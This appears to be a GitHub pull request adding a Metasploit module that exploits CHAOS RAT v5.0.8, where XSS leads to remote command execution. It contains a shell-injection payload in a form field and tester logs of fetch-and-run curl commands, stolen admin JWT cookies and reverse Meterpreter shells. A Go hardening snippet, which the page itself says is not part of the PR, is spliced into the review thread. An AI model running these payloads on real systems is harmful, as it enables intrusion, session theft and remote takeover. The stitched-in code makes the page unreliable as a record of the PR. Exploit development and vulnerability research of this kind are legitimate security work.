
CHAOS rat xss to rce #19104

Merged
merged 3 commits into from May 21, 2024


@h00die h00die commented Apr 17, 2024

CHAOS v5.0.8 is a free and open-source Remote Administration Tool that
allows generating binaries to control remote operating systems. The
webapp contains a remote command execution vulnerability which
can be triggered by an authenticated user when generating a new
executable. The webapp also contains an XSS vulnerability within
the view of a returned command being executed on an agent.

Execution can happen through one of three routes:

  1. Provided credentials can be used to execute the RCE directly
  2. A JWT token from an agent can be provided to emulate a compromised
    host. If a logged-in user attempts to execute a command on the host,
    the returned value contains an XSS payload.
  3. Similar to technique 2, an agent executable can be provided and the
    JWT token can be extracted.

Verified against CHAOS 7d5b20ad7e58e5b525abdcb3a12514b88e87cef2 running
in a docker container.

Verification

  1. Install the application or run the docker image
  2. Start msfconsole
  3. Do: use exploit/linux/http/chaos_rat_xss_to_rce
  4. Do: set rhost [ip]
  5. Pick a method:
  6. set username [username], set password [password]
  7. set jwt [jwt token]
  8. set agent [path to agent]
  9. Do: run
  10. You should get a shell. Interaction by a CHAOS admin may be required

Contributor Author

h00die commented Apr 17, 2024

@chebuya wanted to bring this to your attention since you discovered it

modules/exploits/linux/http/chaos_rat_xss_to_rce.rb (review thread, outdated and resolved)

data.add_part("http://localhost\'$(#{payload.encoded})\'", nil, nil, 'form-data; name="address"')
data.add_part('8080', nil, nil, 'form-data; name="port"')
data.add_part('1', nil, nil, 'form-data; name="os_target"') # 1 windows, 2 linux
Contributor

This module is in the modules/exploit/linux folder - can this be exploited on Windows as well?

Contributor Author

In theory you likely could run this software on Windows; it's written in Golang. The install instructions only mention Linux, and the docker image is Linux (not surprising), so I think Windows installs are minimal if existent at all.

However, this specific option is for when the admin is building a new payload to run on a victim. The option here actually makes no difference; I just opted for 1 since it's the default.
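As an added illustration (not CHAOS's code, nor part of this PR), the following shows how the two weaknesses the PR description names could be closed on the server side: the address field from the snippet above is validated down to a bare scheme://host[:port] and handed to the build tool as a single argv element rather than interpolated into a shell string, and agent command output is HTML-escaped before it is rendered. The build flags, the output-rendering helper and the function names are assumptions for the example.

```go
package main

import (
	"fmt"
	"html"
	"net/url"
	"os/exec"
	"regexp"
)

// Illustrative hardening, not CHAOS's source. It assumes the "address" field
// feeds a build command and that agent output is rendered in the admin page.
// hostPortRe allows a hostname or IP with an optional port, nothing else.
var hostPortRe = regexp.MustCompile(`^[A-Za-z0-9.-]+(:[0-9]{1,5})?$`)

// ValidateAddress accepts only scheme://host[:port] over http(s). net/url
// tolerates ' $ ( ) inside a host, so the regexp is the real gate.
func ValidateAddress(raw string) (string, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return "", err
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return "", fmt.Errorf("address must use http or https, got %q", u.Scheme)
	}
	if u.User != nil || (u.Path != "" && u.Path != "/") || u.RawQuery != "" || u.Fragment != "" {
		return "", fmt.Errorf("address must be scheme://host[:port] only")
	}
	if !hostPortRe.MatchString(u.Host) {
		return "", fmt.Errorf("invalid host %q", u.Host)
	}
	return u.String(), nil
}

// BuildAgentCmd passes the validated address as one argv element: no "sh -c"
// string is assembled, so $(...) is never evaluated. Build flags are assumed.
func BuildAgentCmd(addr, outFile string) (*exec.Cmd, error) {
	clean, err := ValidateAddress(addr)
	if err != nil {
		return nil, err
	}
	return exec.Command("go", "build", "-ldflags", "-X main.address="+clean, "-o", outFile, "./client"), nil
}

// RenderOutput HTML-escapes agent output before it reaches the admin page,
// where the module's XSS payload would otherwise run.
func RenderOutput(out string) string { return "<pre>" + html.EscapeString(out) + "</pre>" }

func main() { fmt.Println(ValidateAddress("http://localhost'$(echo injected)'")) }
```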

# Handle the HTTP request and return a response. Code borrowed from:
# msf/core/exploit/http/server.rb
#
def start_http_service(opts = {})
Contributor

This could probably be handled by the HTTPServer mixin. Also, the HTML mixin can return a webpage if needed.

Contributor Author

Normally that's how I would handle it; however, the direct login method doesn't need an HTTP server, so I wanted to avoid launching it if it wasn't needed. I thought this would be the more efficient route to avoid some kind of potential HTTP server error when it launches (bad IP, port used, etc.) when it wasn't required anyway.

modules/exploits/linux/http/chaos_rat_xss_to_rce.rb (review thread, outdated and resolved)
@cgranleese-r7 cgranleese-r7 self-assigned this May 8, 2024
@cgranleese-r7
Contributor

Tested and seems to be working as intended 👍

Happy to land once the rest of the feedback is resolved.

Credential method

msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit

[*] Command to run on remote host: curl -so ./oYcqobeBZTuJ http://<ip>:9090/Odyz7kVKF-TYi8-49qC08A; chmod +x ./oYcqobeBZTuJ; ./oYcqobeBZTuJ &
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on <ip>:9090
[*] HTTP server started
[*] Adding resource /Odyz7kVKF-TYi8-49qC08A
[*] Started reverse TCP handler on <ip>:4444
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through direct login
[*] Attempting login
[*] Client <ip> requested /Odyz7kVKF-TYi8-49qC08A
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 1 opened (<ip>:4444 -> <ip>:47768) at 2024-05-08 10:23:11 +0100

Agent method

msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit

[*] Command to run on remote host: curl -so ./IyktmtoLxSkl http://<ip>:9090/7PTrmgXiZtm7zaMXvFhTIQ; chmod +x ./IyktmtoLxSkl; ./IyktmtoLxSkl &
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on <ip>:9090
[*] HTTP server started
[*] Adding resource /7PTrmgXiZtm7zaMXvFhTIQ
[*] Started reverse TCP handler on <ip>:4444
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through Agent
[*] Server address: 172.17.0.2
[*] Server port: 8080
[*] Server JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3NDY2OTMwMDAsInVzZXIiOiJkZWZhdWx0In0.E_TQ2pqNzZgRw5syoX_aXFjarI3CNvgP7DcVzLYVPu4
[*] Fake MAC for agent: b5:51:a0:d9:ee:f1
[*] Listening for XSS response on: http://<ip>:8888/
[*] Performing Callback Checkin
[*] WebSocket connecting to receive commands
[*] Performing Callback Checkin
[+] Received agent command 'whoami', sending XSS in return
[*] Received GET request.
[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTUxNjc5MzUsIm9yaWdfaWF0IjoxNzE1MTY0MzM1LCJ1c2VyIjoiYWRtaW4ifQ.de-YBhkfbxKv7l25kw_oo6AELR6_U1nf2VD6JtWzBz4
[+] Detected Agents
Live Agents
===========

 IP            OS       Username                       Hostname  MAC
 --            --       --------                       --------  ---
 <ip>  Windows  Administrator (Administrator)  DC01      b5:51:a0:d9:ee:f1

[*] Client <ip> requested /7PTrmgXiZtm7zaMXvFhTIQ
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 1 opened (<ip>:4444 -> <ip>:61669) at 2024-05-08 11:32:31 +0100

JWT method

msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through JWT token
[*] Fake MAC for agent: fe:9a:14:40:91:66
[*] Listening for XSS response on: http://<ip>:8888/
[*] Performing Callback Checkin
[*] WebSocket connecting to receive commands
[*] Performing Callback Checkin
[+] Received agent command 'whoami', sending XSS in return
[*] Received GET request.
[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTUxNjg1MDgsIm9yaWdfaWF0IjoxNzE1MTY0OTA4LCJ1c2VyIjoiYWRtaW4ifQ.8MjwkzGcIT0QatzRf6kMLMihBTdKyFQb1mrzGfJj9Ho
[+] Detected Agents
Live Agents
===========

 IP            OS       Username                       Hostname  MAC
 --            --       --------                       --------  ---
 <ip>  Windows  Administrator (Administrator)  DC01      a8:ae:8a:9e:e0:11
 <ip>  Windows  Administrator (Administrator)  DC01      fe:9a:14:40:91:66

[*] Client <ip> requested /Odyz7kVKF-TYi8-49qC08A
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 2 opened (<ip>:4444 -> <ip>:33236) at 2024-05-08 11:46:05 +0100

@cgranleese-r7 cgranleese-r7 merged commit 67154a1 into rapid7:master May 21, 2024
34 checks passed
@cgranleese-r7
Contributor

Release Notes

Adds an exploit for CHAOS v5.0.8, which contains a remote command execution vulnerability that
can be triggered through one of three routes: credentials, a JWT token from an agent, or an agent executable that can be provided and the JWT token extracted from it.

@cgranleese-r7 cgranleese-r7 added the rn-modules release notes for new or majorly enhanced modules label May 21, 2024
@h00die h00die deleted the chaos_rat branch May 21, 2024 23:53